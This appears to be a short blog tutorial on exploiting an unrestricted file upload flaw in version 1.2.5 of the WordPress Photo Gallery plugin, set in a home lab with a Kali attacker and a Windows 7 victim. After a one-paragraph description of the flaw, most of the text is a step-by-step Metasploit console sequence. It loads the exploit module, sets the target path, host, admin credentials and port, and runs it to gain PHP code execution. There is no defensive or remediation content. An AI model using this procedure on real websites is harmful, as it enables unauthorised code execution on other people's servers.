Exploit WordPress using Photo Gallery Unrestricted File Upload

Photo Gallery Plugin for WordPress contains a flaw that allows a remote attacker to execute arbitrary PHP code. This flaw exists because the photo-gallery\photo-gallery.php script allows access to filemanager\UploadHandler.php. The post () method in UploadHandler.php does not properly verify or sanitize user-uploaded files.

 Exploit Targets

Photo Gallery Plugin, version 1.2.5.

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set targeturi /wordpress

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set username admin

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set password admin123

msf exploit (wp_photo_gallery_unrestricted_file_upload)>set rport 80

msf exploit (wp_photo_gallery_unrestricted_file_upload)>exploit

Leave a Reply

Your email address will not be published. Required fields are marked *